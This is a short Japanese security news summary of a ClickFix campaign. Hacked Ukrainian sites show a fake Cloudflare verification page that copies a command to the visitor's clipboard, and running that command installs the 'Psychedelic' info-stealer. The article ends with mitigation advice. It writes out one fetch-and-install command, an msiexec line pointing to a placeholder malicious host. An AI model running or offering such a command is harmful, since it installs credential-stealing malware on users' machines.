偽Cloudflareページで誘導する新手情報窃盗マルウェア

概要 ウクライナの正規サイトが改ざんされ、偽のCloudflare検証ページが表示されます。訪問者が指示に従うと、クリップボードにWindowsインストーラコマンドがコピーされ、実行すると「Psychedelic」という情報窃盗マルウェアがダウンロードされます。攻撃はClickFixというキャンペーンで実施されています。 技術的詳細・特徴 攻撃者はサーバーにスクリプトを埋め込み、アクセス時に偽のCloudflare「I’m under attack」ページを返します。ページ内のボタンがクリックされると、JavaScriptでmsiexec /i https://malicious.example.com/psychedelic.msi のコマンドをクリップボードにコピーし、貼り付け実行を促します。マルウェアは未公開の情報窃盗型で、キー入力やスクリーンショット、ブラウザデータを収集します。 影響・対策方法 正規サイトでも偽の検証ページが表示されるため、URLや証明書を必ず確認する。 不審なコピーコマンドは貼り付けず、実行前にファイルのハッシュや出所を検証する。 ブラウザの拡張機能やセキュリティソフトでクリップボード操作を監視する。 Webサーバーの改ざん検知と定期的なファイル整合性チェックを導入する。 出典 情報元: The Hacker News